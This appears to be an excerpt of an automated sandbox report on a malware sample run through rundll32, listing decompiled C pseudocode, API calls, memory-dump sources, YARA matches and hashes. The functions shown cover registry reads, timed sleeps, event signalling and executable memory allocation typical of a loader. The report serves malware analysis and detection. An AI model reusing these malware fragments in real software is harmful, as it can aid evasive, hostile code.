                                          0x048958f7
                                          0x048958f9
                                          0x048958f9
                                          0x00000000
                                          0x048958f7
                                          0x048958bb
                                          0x048958c2
                                          0x048958d0
                                          0x00000000
                                          0x048958d0
                                          0x04895887
                                          0x0489588c
                                          0x0489588c
                                          0x00000000
                                          0x0489588c
                                          0x04895852
                                          0x00000000
                                          0x00000000
                                          0x04895865
                                          0x00000000

                                          APIs
                                          • wsprintfA.USER32 ref: 04895825
                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 0489584A
                                            • Part of subcall function 048959E2: GetTickCount.KERNEL32 ref: 048959F6
                                            • Part of subcall function 048959E2: wsprintfA.USER32 ref: 04895A46
                                            • Part of subcall function 048959E2: wsprintfA.USER32 ref: 04895A63
                                            • Part of subcall function 048959E2: wsprintfA.USER32 ref: 04895A83
                                            • Part of subcall function 048959E2: wsprintfA.USER32 ref: 04895AAF
                                            • Part of subcall function 048959E2: HeapFree.KERNEL32(00000000,00000000), ref: 04895AC1
                                            • Part of subcall function 048959E2: wsprintfA.USER32 ref: 04895AE2
                                            • Part of subcall function 048959E2: HeapFree.KERNEL32(00000000,00000000), ref: 04895AF2
                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 0489586C
                                          • HeapFree.KERNEL32(00000000,?,?), ref: 048958D0
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: wsprintf$Heap$Free$Allocate$CountTick
                                          • String ID:
                                          • API String ID: 1428766365-0
                                          • Opcode ID: 690e94de658986b13e9e2d810dbc2ebd0b6cec1b07bc8d27f6a9b68bd2d5ce3b
                                          • Instruction ID: 5d640b05f3b33c79fa18442c3f698580a82852caff46615193b42bd91ce8c31e
                                          • Opcode Fuzzy Hash: 690e94de658986b13e9e2d810dbc2ebd0b6cec1b07bc8d27f6a9b68bd2d5ce3b
                                          • Instruction Fuzzy Hash: B2312D76600909BBDF06DF98D884A9B37FCFB08354F184916F905E7200EB75AE44DBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 048929F2 Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 41%
                                          			E048929F2(void* __ecx, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t20;
				void* _t26;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t20 = E04896174(__ecx,  &_v32); // executed
				_t38 = _t20;
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E048975C6(_t23);
						}
					}
					return _t38;
				}
				_t26 = E04896955(0x40,  &_v16); // executed
				if(_t26 != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x489a34c, 1, 0,  *0x489a3e4);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8); // executed
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E0489737F(_t36); // executed
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E04896E20(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E04895147(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E04891666( &_v32, _t39);
					goto L13;
				}
			}














                                          0x048929f2
                                          0x048929ff
                                          0x04892a05
                                          0x04892a06
                                          0x04892a07
                                          0x04892a08
                                          0x04892a09
                                          0x04892a0d
                                          0x04892a14
                                          0x04892a19
                                          0x04892a1d
                                          0x04892aa5
                                          0x04892aa5
                                          0x04892aa8
                                          0x04892aaa
                                          0x04892ab2
                                          0x04892ab8
                                          0x04892abb
                                          0x04892abb
                                          0x04892ab8
                                          0x04892ac6
                                          0x04892ac6
                                          0x04892a29
                                          0x04892a30
                                          0x04892a32
                                          0x04892a32
                                          0x04892a49
                                          0x04892a4d
                                          0x04892a50
                                          0x04892a5b
                                          0x04892a62
                                          0x04892a62
                                          0x04892a6b
                                          0x04892a6f
                                          0x04892a7d
                                          0x04892a71
                                          0x04892a71
                                          0x04892a72
                                          0x04892a73
                                          0x04892a74
                                          0x04892a75
                                          0x04892a76
                                          0x04892a76
                                          0x04892a82
                                          0x04892a85
                                          0x04892a89
                                          0x04892a8b
                                          0x04892a8b
                                          0x04892a92
                                          0x00000000
                                          0x04892a94
                                          0x04892a94
                                          0x04892aa1
                                          0x00000000
                                          0x04892aa1

                                          APIs
                                          • CreateEventA.KERNEL32(0489A34C,00000001,00000000,00000040,?,?,76DDF710,00000000,76DDF730), ref: 04892A43
                                          • SetEvent.KERNEL32(00000000), ref: 04892A50
                                          • Sleep.KERNEL32(00000BB8), ref: 04892A5B
                                          • CloseHandle.KERNEL32(00000000), ref: 04892A62
                                            • Part of subcall function 0489737F: RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,04892A82,?), ref: 048973A5
                                            • Part of subcall function 0489737F: RegEnumKeyExA.KERNEL32(?,?,?,04892A82,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,04892A82), ref: 048973EC
                                            • Part of subcall function 0489737F: WaitForSingleObject.KERNEL32(00000000,?,?,?,04892A82,?,04892A82,?,?,?,?,?,04892A82,?), ref: 04897459
                                            • Part of subcall function 0489737F: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,04892A82,?), ref: 04897481
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: CloseEvent$CreateEnumHandleObjectOpenSingleSleepWait
                                          • String ID:
                                          • API String ID: 891522397-0
                                          • Opcode ID: a04b1f34c18d3da9863078bb2977cbb04314cb335288e2f0de3e2e3fa5a28d46
                                          • Instruction ID: 639a97e51e8600292959bea80eb9e903699a62f9e54e6abe6624c5b3a7177450
                                          • Opcode Fuzzy Hash: a04b1f34c18d3da9863078bb2977cbb04314cb335288e2f0de3e2e3fa5a28d46
                                          • Instruction Fuzzy Hash: 7E214473D00919BFDF20BFA888849AE77EDEB48254B0D4E65EA11E7100EB74BD858761
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04894E0B Relevance: 6.1, APIs: 4, Instructions: 80registryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E04894E0B(int _a4, int _a8, void* _a12, short* _a16, char** _a20, intOrPtr* _a24) {
				long _t26;
				intOrPtr* _t38;
				char* _t42;
				long _t43;

				if(_a4 == 0) {
					L2:
					_t26 = RegOpenKeyW(_a8, _a12,  &_a12); // executed
					_t43 = _t26;
					if(_t43 == 0) {
						RegQueryValueExW(_a12, _a16, 0,  &_a8, 0,  &_a4); // executed
						if(_a4 == 0) {
							_t43 = 0xe8;
						} else {
							_t42 = E04894DF6(_a4);
							if(_t42 == 0) {
								_t43 = 8;
							} else {
								_t43 = RegQueryValueExW(_a12, _a16, 0,  &_a8, _t42,  &_a4);
								if(_t43 != 0) {
									E04894C73(_t42);
								} else {
									 *_a20 = _t42;
									_t38 = _a24;
									if(_t38 != 0) {
										 *_t38 = _a4;
									}
								}
							}
						}
						RegCloseKey(_a12); // executed
					}
					L12:
					return _t43;
				}
				_t43 = E04897849(_a4, _a8, _a12, _a16, _a20, _a24);
				if(_t43 == 0) {
					goto L12;
				}
				goto L2;
			}







                                          0x04894e17
                                          0x04894e3a
                                          0x04894e44
                                          0x04894e4a
                                          0x04894e4e
                                          0x04894e66
                                          0x04894e6b
                                          0x04894eb3
                                          0x04894e6d
                                          0x04894e75
                                          0x04894e79
                                          0x04894eb0
                                          0x04894e7b
                                          0x04894e8d
                                          0x04894e91
                                          0x04894ea7
                                          0x04894e93
                                          0x04894e96
                                          0x04894e98
                                          0x04894e9d
                                          0x04894ea2
                                          0x04894ea2
                                          0x04894e9d
                                          0x04894e91
                                          0x04894e79
                                          0x04894ebb
                                          0x04894ebb
                                          0x04894ec2
                                          0x04894ec8
                                          0x04894ec8
                                          0x04894e30
                                          0x04894e34
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          APIs
                                          • RegOpenKeyW.ADVAPI32(80000002,05249EC2,05249EC2), ref: 04894E44
                                          • RegQueryValueExW.KERNEL32(05249EC2,?,00000000,80000002,00000000,00000000,?,04896EFF,3D048990,80000002,04892A82,00000000,04892A82,?,05249EC2,80000002), ref: 04894E66
                                          • RegQueryValueExW.ADVAPI32(05249EC2,?,00000000,80000002,00000000,00000000,00000000,?,04896EFF,3D048990,80000002,04892A82,00000000,04892A82,?,05249EC2), ref: 04894E8B
                                          • RegCloseKey.KERNEL32(05249EC2,?,04896EFF,3D048990,80000002,04892A82,00000000,04892A82,?,05249EC2,80000002,00000000,?), ref: 04894EBB
                                            • Part of subcall function 04897849: SafeArrayDestroy.OLEAUT32(00000000), ref: 048978D1
                                            • Part of subcall function 04894C73: RtlFreeHeap.NTDLL(00000000,00000000,048955C4,00000000,?,?,00000000), ref: 04894C7F
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: QueryValue$ArrayCloseDestroyFreeHeapOpenSafe
                                          • String ID:
                                          • API String ID: 486277218-0
                                          • Opcode ID: 958ab19fcc909c0b1a92c48fe13a4db6809d88c2f742df7b71bfab8dfda04e94
                                          • Instruction ID: ad0988cb8581d13ab5db0a7933085996a90c6adbace0f3a7be9410f34be09c5c
                                          • Opcode Fuzzy Hash: 958ab19fcc909c0b1a92c48fe13a4db6809d88c2f742df7b71bfab8dfda04e94
                                          • Instruction Fuzzy Hash: D6215E7380455EFFDF11AE94DD808EE7BE9FB08660B098A25FE0496110D631AD619B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B6EF7B Relevance: 6.1, APIs: 4, Instructions: 64memoryregistryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegQueryValueExA.KERNEL32(00B66085,?,00000000,00B66085,00000000,00B66095,00B66085,?,?,?,?,00B662F4,80000001,?,00B66085,00B66095), ref: 00B6EFA0
                                          • RtlAllocateHeap.NTDLL(00000000,00B66095,00000000), ref: 00B6EFB7
                                          • HeapFree.KERNEL32(00000000,00000000,?,00B662F4,80000001,?,00B66085,00B66095,?,00B6CC7F,80000001,?,00B66085), ref: 00B6EFD2
                                          • RegQueryValueExA.KERNEL32(00B66085,?,00000000,00B66085,00000000,00B66095,?,00B662F4,80000001,?,00B66085,00B66095,?,00B6CC7F,80000001), ref: 00B6EFF1
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: HeapQueryValue$AllocateFree
                                          • String ID:
                                          • API String ID: 4267586637-0
                                          • Opcode ID: 19d9889e5b4981e14a9329aaeae10636108944d83ed2b5b0105a21edeafe8fab
                                          • Instruction ID: 7c449972e527a1fc9571d0b825bffe69b0c70a1c5c4084e27ec44eed40d39f96
                                          • Opcode Fuzzy Hash: 19d9889e5b4981e14a9329aaeae10636108944d83ed2b5b0105a21edeafe8fab
                                          • Instruction Fuzzy Hash: EB113DBA500118FFEB129F99DC84CEEBBBCEB89750B104066F91597110D7719E40DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 048939B5 Relevance: 6.0, APIs: 4, Instructions: 44sleepthreadtimeCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 65%
                                          			E048939B5(void* __ecx, intOrPtr _a4) {
				struct _FILETIME _v12;
				int _t13;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t30;
				signed int _t34;

				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
				asm("stosd");
				do {
					_t13 = SwitchToThread();
					GetSystemTimeAsFileTime( &_v12);
					_t23 = _v12.dwHighDateTime;
					_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 5;
					_push(0);
					_push(0x13);
					_push(_t23 >> 5);
					_push(_t16);
					L04898326();
					_t34 = _t16 + _t13;
					_t18 = E048954D5(_a4, _t34);
					_t30 = _t18;
					_t19 = 3;
					Sleep(_t19 << (_t34 & 0x00000007)); // executed
				} while (_t30 == 1);
				return _t30;
			}











                                          0x048939ba
                                          0x048939c5
                                          0x048939c6
                                          0x048939c6
                                          0x048939d2
                                          0x048939db
                                          0x048939de
                                          0x048939e2
                                          0x048939e4
                                          0x048939e9
                                          0x048939ea
                                          0x048939eb
                                          0x048939f5
                                          0x048939f8
                                          0x048939ff
                                          0x04893a03
                                          0x04893a0a
                                          0x04893a10
                                          0x04893a1a

                                          APIs
                                          • SwitchToThread.KERNEL32(?,00000001,?,?,?,04893D61,?,?), ref: 048939C6
                                          • GetSystemTimeAsFileTime.KERNEL32(00000000,?,00000001,?,?,?,04893D61,?,?), ref: 048939D2
                                          • _aullrem.NTDLL(00000000,?,00000013,00000000), ref: 048939EB
                                            • Part of subcall function 048954D5: memcpy.NTDLL(00000000,00000000,?,?,00000000,?,?,?,00000000), ref: 04895534
                                          • Sleep.KERNEL32(00000003,00000000,?,00000001,?,?,?,04893D61,?,?), ref: 04893A0A
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: Time$FileSleepSwitchSystemThread_aullremmemcpy
                                          • String ID:
                                          • API String ID: 1610602887-0
                                          • Opcode ID: bb903a3a459dacc5b01a70fb58f15d0439dd0c12b552c9a096ab3490a30ab598
                                          • Instruction ID: bc1c541c89b7443a8272b231591f5ac1d7d71a8a3639819e4e4f3c2c4e66e779
                                          • Opcode Fuzzy Hash: bb903a3a459dacc5b01a70fb58f15d0439dd0c12b552c9a096ab3490a30ab598
                                          • Instruction Fuzzy Hash: 62F0A9B3A005047BDB149A58DC1DBDE77F9DB84355F180514F605E7340E9B4AE008650
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B516A1 Relevance: 6.0, APIs: 4, Instructions: 42stringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,00B79190,00000000,00B63103,?,00B5C793,?), ref: 00B516C0
                                          • PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,00B79190,00000000,00B63103,?,00B5C793,?), ref: 00B516CB
                                          • _wcsupr.NTDLL ref: 00B516D8
                                          • lstrlenW.KERNEL32(00000000), ref: 00B516E0
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileName$AllocateFindHeapImagePathProcess_wcsuprlstrlen
                                          • String ID:
                                          • API String ID: 2533608484-0
                                          • Opcode ID: 27fe435916b2aa5512973f9fa8ea21aed5f88014904d61216eb380f6612ae3ca
                                          • Instruction ID: e103f8cf77e4ceea5a6327215c2d2ab6a421cb6c3b3807b6e55563cbe0e56589
                                          • Opcode Fuzzy Hash: 27fe435916b2aa5512973f9fa8ea21aed5f88014904d61216eb380f6612ae3ca
                                          • Instruction Fuzzy Hash: B0F0B4725416102E93126B7C5CC9F6F56DDEF94767F2409E8FD04D3150CF65CC4945A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B69CDB Relevance: 6.0, APIs: 4, Instructions: 37threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00B69CFA
                                            • Part of subcall function 00B623C2: RtlEnterCriticalSection.NTDLL(00000000), ref: 00B623CE
                                            • Part of subcall function 00B623C2: CloseHandle.KERNEL32(?), ref: 00B623DC
                                            • Part of subcall function 00B623C2: RtlLeaveCriticalSection.NTDLL(00000000), ref: 00B623F8
                                          • CloseHandle.KERNEL32(?), ref: 00B69D08
                                          • InterlockedDecrement.KERNEL32(00B7907C), ref: 00B69D17
                                            • Part of subcall function 00B63EC0: SetEvent.KERNEL32(0000039C,00B69D32), ref: 00B63ECA
                                            • Part of subcall function 00B63EC0: CloseHandle.KERNEL32(0000039C), ref: 00B63EDF
                                            • Part of subcall function 00B63EC0: HeapDestroy.KERNELBASE(05D50000), ref: 00B63EEF
                                          • RtlExitUserThread.NTDLL(00000000), ref: 00B69D33
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle$CriticalSection$DecrementDestroyEnterEventExitHeapInterlockedLeaveMultipleObjectsThreadUserWait
                                          • String ID:
                                          • API String ID: 1141245775-0
                                          • Opcode ID: 7473e6d1a403327be3cc212dfe8cd45a9600f7272635121c87af0d30a9128792
                                          • Instruction ID: 1ecf7d1d75201588b829eb434a5cdfd0fcf9ac9ff1a8e418974444a2c6292d38
                                          • Opcode Fuzzy Hash: 7473e6d1a403327be3cc212dfe8cd45a9600f7272635121c87af0d30a9128792
                                          • Instruction Fuzzy Hash: 6EF0C231640210FBD7015F689C09F6A7BACEB42732F5042A8F539932D0DF789D418BA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 048968F5 Relevance: 6.0, APIs: 4, Instructions: 29sleepmemoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 50%
                                          			E048968F5(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				void* _t9;
				intOrPtr _t10;
				void* _t11;
				void** _t13;

				_t13 = __esi;
				_t4 =  *0x489a3cc; // 0x52495b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x489a3cc; // 0x52495b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t13;
				if(_t8 != 0 && _t8 != 0x489a030) {
					HeapFree( *0x489a2d8, 0, _t8);
				}
				_t9 = E04894117(_v0, _t13); // executed
				_t13[1] = _t9;
				_t10 =  *0x489a3cc; // 0x52495b0
				_t11 = _t10 + 0x40;
				__imp__(_t11);
				return _t11;
			}











                                          0x048968f5
                                          0x048968f5
                                          0x048968fe
                                          0x0489690e
                                          0x0489690e
                                          0x04896913
                                          0x04896918
                                          0x00000000
                                          0x00000000
                                          0x04896908
                                          0x04896908
                                          0x0489691a
                                          0x0489691e
                                          0x04896930
                                          0x04896930
                                          0x0489693b
                                          0x04896940
                                          0x04896943
                                          0x04896948
                                          0x0489694c
                                          0x04896952

                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(05249570), ref: 048968FE
                                          • Sleep.KERNEL32(0000000A), ref: 04896908
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04896930
                                          • RtlLeaveCriticalSection.NTDLL(05249570), ref: 0489694C
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                          • String ID:
                                          • API String ID: 58946197-0
                                          • Opcode ID: c2598ac2cedfa027efd5d53e3a16f23d438adc7fb6fe5900c9693627e3ed7e33
                                          • Instruction ID: d62b875e36a3b01bc3dfaa9b814b7ad08a6d68e5ccc750b5a34344cace9873ab
                                          • Opcode Fuzzy Hash: c2598ac2cedfa027efd5d53e3a16f23d438adc7fb6fe5900c9693627e3ed7e33
                                          • Instruction Fuzzy Hash: DDF0FE70300A81EBEB29AF69DE49F163BF4EB14744B0C4D08F956D6251EA24EC50DB15
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B5A3BD Relevance: 5.1, APIs: 4, Instructions: 110COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.NTDLL ref: 00B5A3E3
                                          • memcpy.NTDLL ref: 00B5A40B
                                            • Part of subcall function 00B6AD9E: NtAllocateVirtualMemory.NTDLL(00B57A68,00000000,00000000,00B57A68,00003000,00000040), ref: 00B6ADCF
                                            • Part of subcall function 00B6AD9E: RtlNtStatusToDosError.NTDLL(00000000), ref: 00B6ADD6
                                            • Part of subcall function 00B6AD9E: SetLastError.KERNEL32(00000000), ref: 00B6ADDD
                                          • GetLastError.KERNEL32(00000010,00000218,00B7327D,00000100,?,00000318,00000008), ref: 00B5A422
                                          • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,00B7327D,00000100), ref: 00B5A505
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Error$Last$AllocateMemoryStatusVirtualmemcpymemset
                                          • String ID:
                                          • API String ID: 685050087-0
                                          • Opcode ID: 1ba666668ca591800f0f7e847226eb0bec09516c0e5b29621a669093af31f3ab
                                          • Instruction ID: e578786655af3a840d21f3370bc323b757d1e2e728fdee5c0f449994ec7c4738
                                          • Opcode Fuzzy Hash: 1ba666668ca591800f0f7e847226eb0bec09516c0e5b29621a669093af31f3ab
                                          • Instruction Fuzzy Hash: D04180B1504301AFD721DF64DC81FABB7E8FB58311F008A6DF999D6251EB70D9148BA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 048967E2 Relevance: 4.6, APIs: 3, Instructions: 94memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E048967E2(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				void* _t40;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E04896955(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x489a348; // 0x9ad5a8
				_t4 = _t24 + 0x489be30; // 0x52493d8
				_t5 = _t24 + 0x489bdd8; // 0x4f0053
				_t26 = E0489427E( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x489a348; // 0x9ad5a8
						_t11 = _t32 + 0x489be24; // 0x52493cc
						_t48 = _t11;
						_t12 = _t32 + 0x489bdd8; // 0x4f0053
						_t52 = E04896203(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x489a348; // 0x9ad5a8
							_t13 = _t35 + 0x489be6e; // 0x30314549
							if(E048913F8(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
								_t61 =  *0x489a2fc - 6;
								if( *0x489a2fc <= 6) {
									_t42 =  *0x489a348; // 0x9ad5a8
									_t15 = _t42 + 0x489bdba; // 0x52384549
									E048913F8(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x489a348; // 0x9ad5a8
							_t17 = _t38 + 0x489be68; // 0x5249410
							_t18 = _t38 + 0x489be40; // 0x680043
							_t40 = E04893B76(_v8, 0x80000001, _t52, _t18, _t17); // executed
							_t45 = _t40;
							HeapFree( *0x489a2d8, 0, _t52);
						}
					}
					HeapFree( *0x489a2d8, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E04895147(_t54);
				}
				return _t45;
			}



















                                          0x048967e2
                                          0x048967f2
                                          0x048967f5
                                          0x048967fc
                                          0x048967fe
                                          0x048967fe
                                          0x04896801
                                          0x04896806
                                          0x0489680d
                                          0x0489681a
                                          0x0489681f
                                          0x04896823
                                          0x04896831
                                          0x0489683f
                                          0x04896843
                                          0x048968d4
                                          0x048968d4
                                          0x04896849
                                          0x04896849
                                          0x0489684e
                                          0x0489684e
                                          0x04896855
                                          0x04896861
                                          0x04896863
                                          0x04896865
                                          0x04896867
                                          0x0489686e
                                          0x04896880
                                          0x04896882
                                          0x04896889
                                          0x0489688b
                                          0x04896892
                                          0x0489689d
                                          0x0489689d
                                          0x04896889
                                          0x048968a2
                                          0x048968a7
                                          0x048968ae
                                          0x048968be
                                          0x048968cc
                                          0x048968ce
                                          0x048968ce
                                          0x04896865
                                          0x048968e0
                                          0x048968e0
                                          0x048968e2
                                          0x048968e7
                                          0x048968e9
                                          0x048968e9
                                          0x048968f4

                                          APIs
                                          • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,052493D8,00000000,?,76DDF710,00000000,76DDF730), ref: 04896831
                                          • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05249410,?,00000000,30314549,00000014,004F0053,052493CC), ref: 048968CE
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04896BB4), ref: 048968E0
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: ecbd9157d61333f4c34e0244b65c6bbd78695ac24676c29b3dde04b812b975e3
                                          • Instruction ID: b4d6a5e255401dd67b4e9b5d391b25b9ea8e692126ef8430b793c4e80ef1eab6
